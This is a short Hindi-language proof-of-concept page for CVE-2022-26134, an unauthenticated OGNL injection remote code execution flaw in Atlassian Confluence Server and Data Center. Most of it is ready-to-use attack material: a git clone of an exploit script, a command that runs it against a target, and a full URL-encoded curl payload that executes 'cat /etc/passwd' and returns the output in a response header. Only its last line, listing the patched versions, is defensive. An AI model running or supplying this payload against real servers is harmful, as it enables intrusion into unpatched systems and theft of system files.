
[PoC] Atlassian Confluence (CVE-2022-26134) - अप्रमाणित OGNL इंजेक्शन भेद्यता (RCE)
Confluence Server और Data Center के प्रभावित संस्करणों में, एक OGNL इंजेक्शन भेद्यता मौजूद है जो एक अप्रमाणित हमलावर को Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देगी।
git clone https://github.com/kh4sh3i/CVE-2022-26134
cd CVE-2022-26134
python3 cve-2022-26134.py https://target.com CMD
CURL कमांड के साथ उदाहरण:
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
फिर, कमांड का परिणाम प्रतिक्रिया हेडर में X-Cmd-Response पैरामीटर में प्रतिबिंबित होगा।
जारी किए गए संस्करण 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 और 7.18.1 इस समस्या के लिए एक सुधार शामिल करते हैं।